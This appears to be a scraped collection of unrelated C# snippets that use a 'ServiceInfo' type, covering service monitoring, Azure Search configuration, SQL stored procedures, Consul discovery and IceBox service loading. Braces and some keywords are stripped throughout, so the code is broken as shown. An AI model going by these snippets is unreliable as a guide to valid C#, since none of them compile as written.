Example #1
        public static void Run()
            while (Nagme.Globals.programRunning) {

                ServiceController[] services = ServiceController.GetServices ();
                List<ServiceInfo> ServiceInfo = new List<ServiceInfo>();

                foreach (ServiceController service in services) {

                    ServiceInfo tmpServiceInfo = new ServiceInfo();

                    tmpServiceInfo.ServiceName = service.ServiceName.ToString();
                    tmpServiceInfo.ServiceStatus = service.Status.ToString();

                    Console.WriteLine (service.ServiceName + " " + service.Status);



                INagMe register = (INagMe)XmlRpcProxyGen.Create(typeof(INagMe));
                register.Url = Nagme.Globals.xmlrpcAddress();
                if(register.updateServiceInfo(ServiceInfo.ToArray(), Nagme.Globals.DeviceID(), Nagme.Globals.DevicePassword())){
                    Console.WriteLine("Updated Service Info");
                    Console.WriteLine("Failed Updating Service Info");

                System.Threading.Thread.Sleep (60000);

        public static ServiceInfo TryGetInfoFromConnectionString()
            ServiceInfo info = null;
            var conn = ConfigurationManager.ConnectionStrings["AzureSearch"];
            if (conn != null)
                    var parts = conn.ConnectionString
                        .Select(p => p.Split('='))
                        .Select(t => new { key = t[0], value = t[1] }).ToList();

                    var service = parts.FirstOrDefault(p => p.key.Equals("ServiceName"));
                    var key = parts.FirstOrDefault(p => p.key.Equals("ApiKey"));
                    if (service != null && key != null)
                        info = new ServiceInfo
                            ServiceName = service.value.Trim(),
                            QueryKey = key.value.Trim()
                    //no need to get all null-checky and collection count happy... if 
                    //something went wrong above, then the connection string existed, but 
                    //is configured incorrectly
                    throw new ConfigurationErrorsException(
                        "The AzureSearch connection string is invalid, or incorrectly formatted");
            return info;
Example #3
        public ServiceInfo InvokeService(EndpointAddress serviceAddress)
            Console.WriteLine("\nInvoking Calculator Service at {0}\n", serviceAddress);

            //Create a client
            //WSHttpBinding binding = new WSHttpBinding(SecurityMode.None, true);
            //binding.MaxReceivedMessageSize = 1024000000;
            //binding.MaxBufferPoolSize = 4096;

            NetTcpBinding binding = new NetTcpBinding(SecurityMode.None,false);
            binding.MaxReceivedMessageSize = 1024000000;
            binding.MaxBufferPoolSize = 4096000;
            binding.TransferMode = TransferMode.Streamed;
            binding.ReceiveTimeout = TimeSpan.MaxValue;
            binding.SendTimeout = TimeSpan.MaxValue;

            //NetTcpBinding binding = new NetTcpBinding(SecurityMode.None, true);
            //binding.MaxReceivedMessageSize = 1024000000;
            //binding.MaxBufferPoolSize = 4096000;
            //binding.TransferMode = TransferMode.Streamed;

            ServiceInfo client = new ServiceInfo(binding, serviceAddress);

            return client;
Example #4
			public CoreInfo(IEmulator emu)
				TypeName = emu.GetType().ToString();
				CoreName = emu.Attributes().CoreName;
				Released = emu.Attributes().Released;
				Services = new Dictionary<string, ServiceInfo>();
				var ser = emu.ServiceProvider;
				foreach (Type t in ser.AvailableServices.Where(type => type != emu.GetType()))
					var si = new ServiceInfo(t, ser.GetService(t));
					Services.Add(si.TypeName, si);

				var notapplicableAttr = ((ServiceNotApplicable)Attribute
					.GetCustomAttribute(emu.GetType(), typeof(ServiceNotApplicable)));

				if (notapplicableAttr != null)
					NotApplicableTypes = notapplicableAttr.NotApplicableTypes
					.Select(x => x.ToString())
					NotApplicableTypes = new List<string>();
Example #5
 public RunnerDataHolder( PluginAssemblyInfo[] allAssemblies,
                         PluginInfo[] oldPlugins,
                         ServiceInfo[] notFoundServices )
     _allAssemblies = allAssemblies;
     _oldPlugins = oldPlugins;
     _notFoundServices = notFoundServices;
Example #6
 public ServiceRefInfo( ServiceInfo r, bool isIServiceWrapped, bool isGeneric, bool isIDynamicService )
     Debug.Assert( !isIServiceWrapped || isIDynamicService, "IService<T> ==> T : IDynamicService" );
     Reference = r;
     IsIServiceWrapped = isIServiceWrapped;
     IsUnknownGenericInterface = isGeneric && !isIServiceWrapped;
     IsIDynamicService = isIDynamicService;
 public static ServiceInfo TryGetInfoFromAppSettings()
     ServiceInfo info = null;
     var service = ConfigurationManager.AppSettings["Azure.Search.ServiceName"];
     var key = ConfigurationManager.AppSettings["Azure.Search.ApiKey"];
     if (service != null && key != null)
         info = new ServiceInfo { ServiceName = service, QueryKey = key };
     return info;
 public static void CreateService(ServiceInfo Service)
     SqlConnection Con = ConnectionHelper.GetConnection();
     string Sp = "Usp_Create_Service";
     SqlCommand cmd = new SqlCommand(Sp, Con);
     cmd.Parameters.Add(new SqlParameter("@ServiceName", Service.ServiceName));
     cmd.Parameters.Add(new SqlParameter("@CatID", Service.CategoryID));
     cmd.Parameters.Add(new SqlParameter("@ServicePrice", Service.rate));
     cmd.CommandType = CommandType.StoredProcedure;
     catch (Exception ex)
         throw ex;
    protected void Page_Load(object sender, EventArgs e)
        ServiceInfo objSvcInfo;
        CommonUtil objComUtil = new CommonUtil();
        if (Session == null || Session["serviceInfo"] == null)

            objSvcInfo = new ServiceInfo();
            objSvcInfo = (ServiceInfo)Session["serviceInfo"];

        //set the master page controls translated text

        lnkTnC.InnerHtml = objComUtil.getTransText(lnkTnC.Attributes["name"]);
        lnkDisclaimer.InnerText = objComUtil.getTransText(lnkDisclaimer.Attributes["name"]);
        lnkFullSite.InnerText = objComUtil.getTransText(lnkFullSite.Attributes["name"]);
        btnBack.InnerHtml = objComUtil.getTransText("Back");
Example #10
        public static ServiceInfo DiscoveryService(string consulEndpoint, string serviceName,string tag=null)
            using (var client = new HttpClient())
                var traefikUrl = string.Format("{0}/v1/health/service/{1}", consulEndpoint, serviceName);

                if (!string.IsNullOrEmpty(tag))
                    traefikUrl = traefikUrl + "?tag=" + tag;

                var traefikInfo = client.GetAsync(traefikUrl).Result.Content.ReadAsAsync<JArray>().Result;
                foreach (var info in traefikInfo)
                    var serviceIsOk = info["Checks"].Any(item => item.Value<string>("CheckID") == "service:"+serviceName
                                                         && item.Value<string>("Status") == "passing");
                    if (!serviceIsOk)

                    var port = info.SelectToken("Service.Port").Value<string>();
                    var address = info.SelectToken("Service.Address").Value<string>();
                    if (string.IsNullOrEmpty(address))
                        address = info.SelectToken("Node.Address").Value<string>();

                    var serviceInfo = new ServiceInfo
                                          Address = address,
                                          Port = port,
                                          ServiceName = serviceName
                    return serviceInfo;

                return null;
    public static ServiceInfo GetServicebyID(int id)
        ServiceInfo _service = new ServiceInfo();
        SqlConnection con = ConnectionHelper.GetConnection();
        string sp = "Usp_ById_Service";
        SqlCommand cmd = new SqlCommand(sp, con);
        cmd.Parameters.Add(new SqlParameter("@ServID", id));
        cmd.CommandType = CommandType.StoredProcedure;
            SqlDataReader _Reader = cmd.ExecuteReader();

            _service.ServiceName= (_Reader["ServiceName"].ToString());
            _service.ServiceID = int.Parse(_Reader["ServiceID"].ToString());
            _service.CategoryID = int.Parse(_Reader["CategoryID"].ToString());
            _service.rate = int.Parse(_Reader["ServicePrice"].ToString());
            return _service;
        catch (Exception ex)
            throw ex;
 public static void Install(ServiceInfo serviceInfo)
     Install(true, serviceInfo);
Example #13
 public override Task RegisterAsync(ServiceInfo serviceInfo)
     return TaskHelper.FromResult<object>(null);
 public void Update_Service(ServiceInfo service)
Example #15
        private void startService(string service, string entryPoint, string[] args)
            // Extract the assembly name and the class name.
            string err = "ServiceManager: unable to load service '" + entryPoint + "': ";
            int sepPos = entryPoint.IndexOf(':');
            if(sepPos != -1 && IceInternal.AssemblyUtil.platform_ == IceInternal.AssemblyUtil.Platform.Windows)
                const string driveLetters = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
                if(entryPoint.Length > 3 &&
                   sepPos == 1 &&
                   driveLetters.IndexOf(entryPoint[0]) != -1 &&
                   (entryPoint[2] == '\\' || entryPoint[2] == '/'))
                    sepPos = entryPoint.IndexOf(':', 3);
            if(sepPos == -1)
                FailureException e = new FailureException();
                e.reason = err + "invalid entry point format";
                throw e;

            System.Reflection.Assembly serviceAssembly = null;
            string assemblyName = entryPoint.Substring(0, sepPos);
            string className = entryPoint.Substring(sepPos + 1);

                // First try to load the assembly using Assembly.Load, which will succeed
                // if a fully-qualified name is provided or if a partial name has been qualified
                // in configuration. If that fails, try Assembly.LoadFrom(), which will succeed
                // if a file name is configured or a partial name is configured and DEVPATH is used.
                    serviceAssembly = System.Reflection.Assembly.Load(assemblyName);
                catch(System.IO.IOException ex)
                        serviceAssembly = System.Reflection.Assembly.LoadFrom(assemblyName);
                         throw ex;
            catch(System.Exception ex)
                FailureException e = new FailureException(ex);
                e.reason = err + "unable to load assembly: " + assemblyName;
                throw e;

            // Instantiate the class.
            System.Type c = null;
                c = serviceAssembly.GetType(className, true);
            catch(System.Exception ex)
                FailureException e = new FailureException(ex);
                e.reason = err + "GetType failed for '" + className + "'";
                throw e;

            ServiceInfo info = new ServiceInfo();
            info.name = service;
            info.status = ServiceStatus.Stopped;
            info.args = args;

            // If IceBox.UseSharedCommunicator.<name> is defined, create a
            // communicator for the service. The communicator inherits
            // from the shared communicator properties. If it's not
            // defined, add the service properties to the shared
            // commnunicator property set.
            Ice.Communicator communicator;
            if(_communicator.getProperties().getPropertyAsInt("IceBox.UseSharedCommunicator." + service) > 0)
                Debug.Assert(_sharedCommunicator != null);
                communicator = _sharedCommunicator;
                // Create the service properties. We use the communicator properties as the default
                // properties if IceBox.InheritProperties is set.
                Ice.InitializationData initData = new Ice.InitializationData();
                initData.properties = createServiceProperties(service);
                if(info.args.Length > 0)
                    // Create the service properties with the given service arguments. This should
                    // read the service config file if it's specified with --Ice.Config.
                    initData.properties = Ice.Util.createProperties(ref info.args, initData.properties);

                    // Next, parse the service "<service>.*" command line options (the Ice command
                    // line options were parsed by the createProperties above)
                    info.args = initData.properties.parseCommandLineOptions(service, info.args);

                // Clone the logger to assign a new prefix. If one of the built-in loggers is configured
                // don't set any logger.
                if(initData.properties.getProperty("Ice.LogFile").Length == 0 &&
                   (initData.properties.getPropertyAsInt("Ice.UseSyslog") <= 0 ||
                    IceInternal.AssemblyUtil.platform_ == IceInternal.AssemblyUtil.Platform.Windows))
                    initData.logger = _logger.cloneWithPrefix(initData.properties.getProperty("Ice.ProgramName"));

                // If Admin is enabled on the IceBox communicator, for each service that does not set
                // Ice.Admin.Enabled, we set Ice.Admin.Enabled=1 to have this service create facets; then
                // we add these facets to the IceBox Admin object as IceBox.Service.<service>.<facet>.
                string serviceFacetNamePrefix = "IceBox.Service." + service + ".";
                bool addFacets = configureAdmin(initData.properties, serviceFacetNamePrefix);

                // Remaining command line options are passed to the communicator. This is
                // necessary for Ice plug-in properties (e.g.: IceSSL).
                info.communicator = Ice.Util.initialize(ref info.args, initData);
                communicator = info.communicator;

                    // Add all facets created on the service communicator to the IceBox communicator
                    // but renamed IceBox.Service.<service>.<facet-name>, except for the Process facet
                    // which is never added
                    foreach(KeyValuePair<string, Ice.Object> p in communicator.findAllAdminFacets())
                            _communicator.addAdminFacet(p.Value, serviceFacetNamePrefix + p.Key);

                // Instantiate the service.
                    // If the service class provides a constructor that accepts an Ice.Communicator argument,
                    // use that in preference to the default constructor.
                    Type[] parameterTypes = new Type[1];
                    parameterTypes[0] = typeof(Ice.Communicator);
                    System.Reflection.ConstructorInfo ci = c.GetConstructor(parameterTypes);
                    if(ci != null)
                            Object[] parameters = new Object[1];
                            parameters[0] = _communicator;
                            info.service = (Service)ci.Invoke(parameters);
                        catch(System.MethodAccessException ex)
                            FailureException e = new FailureException(ex);
                            e.reason = err + "unable to access service constructor " + className + "(Ice.Communicator)";
                            throw e;
                        // Fall back to the default constructor.
                            info.service = (Service)IceInternal.AssemblyUtil.createInstance(c);
                            if(info.service == null)
                                FailureException e = new FailureException();
                                e.reason = err + "no default constructor for '" + className + "'";
                                throw e;
                        catch(System.UnauthorizedAccessException ex)
                            FailureException e = new FailureException(ex);
                            e.reason = err + "unauthorized access to default service constructor for " + className;
                            throw e;
                catch(System.InvalidCastException ex)
                    FailureException e = new FailureException(ex);
                    e.reason = err + "service does not implement IceBox.Service";
                    throw e;
                catch(System.Reflection.TargetInvocationException ex)
                    if(ex.InnerException is IceBox.FailureException)
                        throw ex.InnerException;
                        FailureException e = new FailureException(ex.InnerException);
                        e.reason = err + "exception in service constructor for " + className;
                        throw e;
                catch(System.Exception ex)
                    FailureException e = new FailureException(ex);
                    e.reason = err + "exception in service constructor " + className;
                    throw e;

                    info.service.start(service, communicator, info.args);
                catch(System.Exception ex)
                    FailureException e = new FailureException(ex);
                    e.reason = "exception while starting service " + service;
                    throw e;

                info.status = ServiceStatus.Started;
                if(info.communicator != null)
                    destroyServiceCommunicator(service, info.communicator);


Example #16
        private void BindForm()
            if (PanelSecurity.SelectedUser.Role == UserRole.Administrator &&
                PanelSecurity.PackageId < 2)

            if (PanelSecurity.LoggedUser.Role != UserRole.Administrator)

            string modeText  = "{0}";
            string modeValue = "";

            if (PanelSecurity.PackageId > 0)
                // load a single package
                PackageInfo restorePackage = ES.Services.Packages.GetPackage(PanelSecurity.PackageId);

                // load "store" packages
                PackageInfo[] packages = ES.Services.Packages.GetMyPackages(PanelSecurity.SelectedUser.UserId);
                foreach (PackageInfo package in packages)
                    ddlSpace.Items.Add(new ListItem(package.PackageName, package.PackageId.ToString()));
                ddlSpace.SelectedValue = PanelSecurity.PackageId.ToString();

                modeText  = "Text.SpaceRestoreMode";
                modeValue = restorePackage.PackageName;
            else if (PanelRequest.ServiceId > 0)

                ServiceInfo service = ES.Services.Servers.GetServiceInfo(PanelRequest.ServiceId);

                modeText  = "Text.ServiceRestoreMode";
                modeValue = service.ServiceName;
            else if (PanelRequest.ServerId > 0)

                ServerInfo server = ES.Services.Servers.GetServerById(PanelRequest.ServerId);

                modeText  = "Text.ServerRestoreMode";
                modeValue = server.ServerName;
            else if (PanelSecurity.SelectedUserId > 0)
                // load user spaces
                PackageInfo[] packages = ES.Services.Packages.GetMyPackages(PanelSecurity.SelectedUserId);
                foreach (PackageInfo package in packages)
                    ddlSpace.Items.Add(new ListItem(package.PackageName, package.PackageId.ToString()));

                modeText  = "Text.UserRestoreMode";
                modeValue = PanelSecurity.SelectedUser.Username;

            // restore type
            litRestoreType.Text = String.Format(GetLocalizedString(modeText), modeValue);

    protected void Page_Load(object sender, EventArgs e)
        //Get the Service Object from sEssion
        objServ = (ServiceInfo)HttpContext.Current.Session["serviceInfo"];

        if (objServ != null)

            //Set the Control names based on the Culture Code
            lblUserName.InnerText = objCommonUtil.getTransText(lblUserName.Attributes["name"]);
            btnSendToMail.Text = objCommonUtil.getTransText(btnSendToMail.Attributes["name"]);
Example #18
        private void startService(string service, string entryPoint, string[] args)
            ServiceInfo info = new ServiceInfo();
            info.name = service;
            info.status = ServiceStatus.Stopped;
            info.args = args;

            // Retrieve the assembly name and the type.
            string err = "ServiceManager: unable to load service '" + entryPoint + "': ";
            int sepPos = entryPoint.IndexOf(':');
            if(sepPos != -1)
                if(entryPoint.Length > 3 &&
                   sepPos == 1 &&
                   System.Char.IsLetter(entryPoint[0]) &&
                   (entryPoint[2] == '\\' || entryPoint[2] == '/'))
                    sepPos = entryPoint.IndexOf(':', 3);
            if(sepPos == -1)
                FailureException e = new FailureException();
                e.reason = err + "invalid entry point format: " + entryPoint;
                throw e;

            System.Reflection.Assembly serviceAssembly = null;
            string assemblyName = entryPoint.Substring(0, sepPos);
                // First try to load the assemby using Assembly.Load which will succeed
                // if full name is configured or partial name has been qualified in config.
                // If that fails, try Assembly.LoadFrom() which will succeed if a file name
                // is configured or partial name is configured and DEVPATH is used.
                    serviceAssembly = System.Reflection.Assembly.Load(assemblyName);
                catch(System.IO.IOException ex)
                        serviceAssembly = System.Reflection.Assembly.LoadFrom(assemblyName);
                         throw ex;
            catch(System.Exception ex)
                FailureException e = new FailureException(ex);
                e.reason = err + "unable to load assembly: " + assemblyName;
                throw e;

            // Instantiate the class.
            string className = entryPoint.Substring(sepPos + 1);
            System.Type c = null;
                c = serviceAssembly.GetType(className, true);
            catch(System.Exception ex)
                FailureException e = new FailureException(ex);
                e.reason = err + "GetType failed for '" + className + "'";
                throw e;

                // If the service class provides a constructor that accepts an Ice.Communicator argument,
                // use that in preference to the default constructor.
                Type[] parameterTypes = new Type[1];
                parameterTypes[0] = typeof(Ice.Communicator);
                System.Reflection.ConstructorInfo ci = c.GetConstructor(parameterTypes);
                if(ci != null)
                        Object[] parameters = new Object[1];
                        parameters[0] = _communicator;
                        info.service = (Service)ci.Invoke(parameters);
                    catch(System.MethodAccessException ex)
                        FailureException e = new FailureException(ex);
                        e.reason = err + "unable to access service constructor " + className + "(Ice.Communicator)";
                        throw e;
                    // Fall back to the default constructor.
                        info.service = (Service)IceInternal.AssemblyUtil.createInstance(c);
                        if(info.service == null)
                            FailureException e = new FailureException();
                            e.reason = err + "no default constructor for '" + className + "'";
                            throw e;
                    catch(System.UnauthorizedAccessException ex)
                        FailureException e = new FailureException(ex);
                        e.reason = err + "unauthorized access to default service constructor for " + className;
                        throw e;
            catch(System.InvalidCastException ex)
                FailureException e = new FailureException(ex);
                e.reason = err + "service does not implement IceBox.Service";
                throw e;
            catch(System.Reflection.TargetInvocationException ex)
                if(ex.InnerException is IceBox.FailureException)
                    throw ex.InnerException;
                    FailureException e = new FailureException(ex.InnerException);
                    e.reason = "ServiceManager: exception in service constructor for " + className;
                    throw e;
            catch(System.Exception ex)
                FailureException e = new FailureException(ex);
                e.reason = err + "exception in service constructor " + className;
                throw e;

            // Invoke Service::start().
                // If IceBox.UseSharedCommunicator.<name> is defined, create a
                // communicator for the service. The communicator inherits
                // from the shared communicator properties. If it's not
                // defined, add the service properties to the shared
                // commnunicator property set.
                Ice.Communicator communicator;
                if(_communicator.getProperties().getPropertyAsInt("IceBox.UseSharedCommunicator." + service) > 0)
                    Debug.Assert(_sharedCommunicator != null);
                    communicator = _sharedCommunicator;
                    // Create the service properties. We use the communicator properties as the default
                    // properties if IceBox.InheritProperties is set.
                    Ice.InitializationData initData = new Ice.InitializationData();
                    initData.properties = createServiceProperties(service);
                    if(info.args.Length > 0)
                        // Create the service properties with the given service arguments. This should
                        // read the service config file if it's specified with --Ice.Config.
                        initData.properties = Ice.Util.createProperties(ref info.args, initData.properties);

                        // Next, parse the service "<service>.*" command line options (the Ice command
                        // line options were parsed by the createProperties above)
                        info.args = initData.properties.parseCommandLineOptions(service, info.args);

                    // Clone the logger to assign a new prefix.
                    initData.logger = _logger.cloneWithPrefix(initData.properties.getProperty("Ice.ProgramName"));

                    // Remaining command line options are passed to the communicator. This is
                    // necessary for Ice plug-in properties (e.g.: IceSSL).
                    info.communicator = Ice.Util.initialize(ref info.args, initData);
                    communicator = info.communicator;

                    info.service.start(service, communicator, info.args);
                    info.status = ServiceStatus.Started;
                    if(info.communicator != null)
                            // Ignore, the service might have already destroyed
                            // the communicator for its own reasons.
                        catch(System.Exception e)
                            _logger.warning("ServiceManager: exception while shutting down communicator for service "
                                            + service + "\n" + e.ToString());

                        catch(System.Exception e)
                            _logger.warning("ServiceManager: exception while destroying communicator for service "
                                            + service + "\n" + e.ToString());

            catch(System.Exception ex)
                FailureException e = new FailureException(ex);
                e.reason = "ServiceManager: exception while starting service " + service;
                throw e;
Example #19
        /// <summary>
        /// Get log items by identifiers
        /// </summary>
        /// <param name="logIds">Log item identifiers</param>
        /// <returns>Log items</returns>
        //public virtual IList<Log> GetLogByIds(int[] logIds)
        //   {
        //       if (logIds == null || logIds.Length == 0)
        //           return new List<Log>();

        //       var query = from l in _logRepository.Table
        //                   where logIds.Contains(l.Id)
        //                   select l;
        //       var logItems = query.ToList();
        //       //sort by passed identifiers
        //       var sortedLogItems = new List<Log>();
        //       foreach (int id in logIds)
        //       {
        //           var log = logItems.Find(x => x.Id == id);
        //           if (log != null)
        //               sortedLogItems.Add(log);
        //       }
        //       return sortedLogItems;
        //   }

        public Log InsertLog(LogLevel logLevel, string shortMessage, string fullMessage = "", ServiceInfo serviceInfo = null)
            var log = new Log
                LogLevel     = logLevel,
                ShortMessage = shortMessage,
                FullMessage  = fullMessage,
                serviceInfo  = serviceInfo,
                CreatedOnUtc = DateTime.UtcNow


Example #20
        //public static IApplicationBuilder UseCobMvc<T>(this IApplicationBuilder mvcBuilder, Action<CobMvcStartupOptions> optionSetup = null)//, Action<CobMvcOptions> option
        //    return mvcBuilder.UseCobMvc(opt=>
        //    {
        //        opt.ServiceName = typeof(T).Assembly.GetName().Name;
        //        optionSetup?.Invoke(opt);
        //    });

        /// <summary>
        /// 启用cobmvc服务注册,放置在UseMvc()之前
        /// </summary>
        /// <param name="mvcBuilder"></param>
        /// <returns></returns>
        public static IApplicationBuilder UseCobMvc(this IApplicationBuilder mvcBuilder, Action <CobMvcOptions> optionsSetup = null)//
            var options = mvcBuilder.ApplicationServices.GetService <IOptions <CobMvcOptions> >().Value;


            if (string.IsNullOrWhiteSpace(options.ServiceAddress))
                var addr = mvcBuilder.ServerFeatures.Get <IServerAddressesFeature>();
                if (addr.Addresses.Any())
                    options.ServiceAddress = addr.Addresses.First();
                    Console.WriteLine($"use addr:{options.ServiceAddress} from server feature");
#if !DEBUG
                    options.ServiceAddress = NetHelper.ChangeToExternal(options.ServiceAddress);
                    Console.WriteLine($"convert addr to external: {options.ServiceAddress}");

            if (string.IsNullOrWhiteSpace(options.ServiceAddress))
                options.ServiceAddress = "http://localhost:5000";

            if (string.IsNullOrWhiteSpace(options.ServiceName))
                options.ServiceName = Assembly.GetEntryAssembly().GetName().Name;

            var uri = new Uri(options.ServiceAddress);

            var svcInfo = new ServiceInfo
                Address = uri.ToString(),
                Name    = options.ServiceName,
                ID      = StringHelper.ToMD5(options.ServiceAddress + options.ServiceName),//
                //Port = uri.Port

            if (!string.IsNullOrWhiteSpace(options.HealthCheck))
                svcInfo.CheckInfoes = new[] {
                    new ServiceCheckInfo {
                        Type     = ServiceCheckInfoType.Http,
                        Target   = new Uri(UriHelper.Combine(options.ServiceAddress, options.HealthCheck)),
                        Interval = TimeSpan.FromSeconds(3),
                        Timeout  = TimeSpan.FromSeconds(60)

            var logger = mvcBuilder.ApplicationServices.GetRequiredService <ILoggerFactory>().CreateLogger <CobMvcMiddleware>();
            logger.LogDebug("register service:{0}\t{1}", svcInfo.Name, svcInfo.Address);

            var reg = mvcBuilder.ApplicationServices.GetRequiredService <IServiceRegistration>();

            mvcBuilder.UseMiddleware <CobMvcMiddleware>();


Example #21
        /// <summary>
        /// 获取新服务信息并与缓存对比后返回最新
        /// </summary>
        public ServiceInfo ProcessServiceJson(string json)
            ServiceInfo serviceInfo = JsonConvert.DeserializeObject <ServiceInfo>(json);
            ServiceInfo oldService  = null;

            _serviceInfoMap.TryGetValue(serviceInfo.GetKey(), out oldService);

            if (serviceInfo.Hosts == null || !serviceInfo.Validate())

            bool changed = false;

            if (oldService != null)
                if (oldService.LastRefTime > serviceInfo.LastRefTime)
                    _logger.Warn($"out of date data received, old-t: {oldService.LastRefTime}, new-t: {serviceInfo.LastRefTime}");

                _serviceInfoMap.Add(serviceInfo.GetKey(), serviceInfo);

                var oldHostMap = oldService.Hosts.ToDictionary(x => x.ToInetAddr());
                var newHostMap = serviceInfo.Hosts.ToDictionary(x => x.ToInetAddr());

                var modHosts  = newHostMap.Where(x => oldHostMap.ContainsKey(x.Key) && !x.Value.ToString().Equals(oldHostMap[x.Key].ToString())).Select(x => x.Value);
                var newHosts  = newHostMap.Where(x => !oldHostMap.ContainsKey(x.Key)).Select(x => x.Value);
                var remvHosts = oldHostMap.Where(x => !newHostMap.ContainsKey(x.Key)).Select(x => x.Value);

                if (newHosts.Count() > 0)
                    changed = true;
                    _logger.Info($"new ips ({newHosts.Count()}) service: {serviceInfo.GetKey()} -> {JsonConvert.SerializeObject(newHosts)}");

                if (remvHosts.Count() > 0)
                    changed = true;
                    _logger.Info($"removed ips ({remvHosts.Count()}) service: {serviceInfo.GetKey()} -> {JsonConvert.SerializeObject(remvHosts)}");

                if (modHosts.Count() > 0)
                    changed = true;
                    _logger.Info($"modified ips ({modHosts.Count()}) service: {serviceInfo.GetKey()} -> {JsonConvert.SerializeObject(modHosts)}");

                if (newHosts.Count() > 0 || remvHosts.Count() > 0 || modHosts.Count() > 0)
                    DiskCache.WriteServiceInfo(_cacheDir, serviceInfo);
                changed = true;
                _logger.Info($"init new ips({serviceInfo.IpCount()}) service: {serviceInfo.GetKey()} -> {JsonConvert.SerializeObject(serviceInfo.Hosts)}");
                _serviceInfoMap.Add(serviceInfo.GetKey(), serviceInfo);
                DiskCache.WriteServiceInfo(_cacheDir, serviceInfo);

            if (changed)
                _logger.Info($"current ips({serviceInfo.IpCount()}) service: {serviceInfo.GetKey()} -> {JsonConvert.SerializeObject(serviceInfo.Hosts)}");

Example #22
        public override void startService(string name, Ice.Current current)
            ServiceInfo info = new ServiceInfo();

            lock (this)
                // Search would be more efficient if services were contained in
                // a map, but order is required for shutdown.
                int i;
                for (i = 0; i < _services.Count; ++i)
                    info = _services[i];
                    if (info.name.Equals(name))
                        if (_services[i].status != ServiceStatus.Stopped)
                            throw new AlreadyStartedException();
                        info.status  = ServiceStatus.Starting;
                        _services[i] = info;
                if (i == _services.Count)
                    throw new NoSuchServiceException();
                _pendingStatusChanges = true;

            bool started = false;

                info.service.start(info.name, info.communicator == null ? _sharedCommunicator : info.communicator,
                started = true;
            catch (Exception e)
                _logger.warning("ServiceManager: exception while starting service " + info.name + ":\n" + e.ToString());

            lock (this)
                int i;
                for (i = 0; i < _services.Count; ++i)
                    info = _services[i];
                    if (info.name.Equals(name))
                        if (started)
                            info.status = ServiceStatus.Started;

                            List <string> services = new List <string>();
                            servicesStarted(services, _observers.Keys);
                            info.status = ServiceStatus.Stopped;
                        _services[i] = info;
                _pendingStatusChanges = false;
Example #23
        private void startService(string service, string entryPoint, string[] args)
            lock (this)
                // Extract the assembly name and the class name.
                string err    = "ServiceManager: unable to load service '" + entryPoint + "': ";
                int    sepPos = entryPoint.IndexOf(':');
                if (sepPos != -1)
                    const string driveLetters = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
                    if (entryPoint.Length > 3 &&
                        sepPos == 1 &&
                        driveLetters.IndexOf(entryPoint[0]) != -1 &&
                        (entryPoint[2] == '\\' || entryPoint[2] == '/'))
                        sepPos = entryPoint.IndexOf(':', 3);
                if (sepPos == -1)
                    FailureException e = new FailureException();
                    e.reason = err + "invalid entry point format";
                    throw e;

                System.Reflection.Assembly serviceAssembly = null;
                string assemblyName = entryPoint.Substring(0, sepPos);
                string className    = entryPoint.Substring(sepPos + 1);

                    // First try to load the assembly using Assembly.Load, which will succeed
                    // if a fully-qualified name is provided or if a partial name has been qualified
                    // in configuration. If that fails, try Assembly.LoadFrom(), which will succeed
                    // if a file name is configured or a partial name is configured and DEVPATH is used.
                        serviceAssembly = System.Reflection.Assembly.Load(assemblyName);
                    catch (System.IO.IOException ex)
                            serviceAssembly = System.Reflection.Assembly.LoadFrom(assemblyName);
                        catch (System.IO.IOException)
                            throw ex;
                catch (Exception ex)
                    FailureException e = new FailureException(ex);
                    e.reason = err + "unable to load assembly: " + assemblyName;
                    throw e;

                // Instantiate the class.
                Type c = null;
                    c = serviceAssembly.GetType(className, true);
                catch (Exception ex)
                    FailureException e = new FailureException(ex);
                    e.reason = err + "GetType failed for '" + className + "'";
                    throw e;

                ServiceInfo info = new ServiceInfo();
                info.name   = service;
                info.status = ServiceStatus.Stopped;
                info.args   = args;

                // If IceBox.UseSharedCommunicator.<name> is defined, create a
                // communicator for the service. The communicator inherits
                // from the shared communicator properties. If it's not
                // defined, add the service properties to the shared
                // commnunicator property set.
                Ice.Communicator communicator;
                if (_communicator.getProperties().getPropertyAsInt("IceBox.UseSharedCommunicator." + service) > 0)
                    Debug.Assert(_sharedCommunicator != null);
                    communicator = _sharedCommunicator;
                    // Create the service properties. We use the communicator properties as the default
                    // properties if IceBox.InheritProperties is set.
                    Ice.InitializationData initData = new Ice.InitializationData();
                    initData.properties = createServiceProperties(service);
                    if (info.args.Length > 0)
                        // Create the service properties with the given service arguments. This should
                        // read the service config file if it's specified with --Ice.Config.
                        initData.properties = Ice.Util.createProperties(ref info.args, initData.properties);

                        // Next, parse the service "<service>.*" command line options (the Ice command
                        // line options were parsed by the createProperties above)
                        info.args = initData.properties.parseCommandLineOptions(service, info.args);

                    // Clone the logger to assign a new prefix. If one of the built-in loggers is configured
                    // don't set any logger.
                    if (initData.properties.getProperty("Ice.LogFile").Length == 0)
                        initData.logger = _logger.cloneWithPrefix(initData.properties.getProperty("Ice.ProgramName"));

                    // If Admin is enabled on the IceBox communicator, for each service that does not set
                    // Ice.Admin.Enabled, we set Ice.Admin.Enabled=1 to have this service create facets; then
                    // we add these facets to the IceBox Admin object as IceBox.Service.<service>.<facet>.
                    string serviceFacetNamePrefix = "IceBox.Service." + service + ".";
                    bool   addFacets = configureAdmin(initData.properties, serviceFacetNamePrefix);

                    // Remaining command line options are passed to the communicator. This is
                    // necessary for Ice plug-in properties (e.g.: IceSSL).
                    info.communicator = Ice.Util.initialize(ref info.args, initData);
                    communicator      = info.communicator;

                    if (addFacets)
                        // Add all facets created on the service communicator to the IceBox communicator
                        // but renamed IceBox.Service.<service>.<facet-name>, except for the Process facet
                        // which is never added
                        foreach (KeyValuePair <string, Ice.Object> p in communicator.findAllAdminFacets())
                            if (!p.Key.Equals("Process"))
                                _communicator.addAdminFacet(p.Value, serviceFacetNamePrefix + p.Key);

                    // Instantiate the service.
                        // If the service class provides a constructor that accepts an Ice.Communicator argument,
                        // use that in preference to the default constructor.
                        Type[] parameterTypes = new Type[1];
                        parameterTypes[0] = typeof(Ice.Communicator);
                        System.Reflection.ConstructorInfo ci = c.GetConstructor(parameterTypes);
                        if (ci != null)
                                object[] parameters = new object[1];
                                parameters[0] = _communicator;
                                info.service  = (Service)ci.Invoke(parameters);
                            catch (MethodAccessException ex)
                                FailureException e = new FailureException(ex);
                                e.reason = err + "unable to access service constructor " + className + "(Ice.Communicator)";
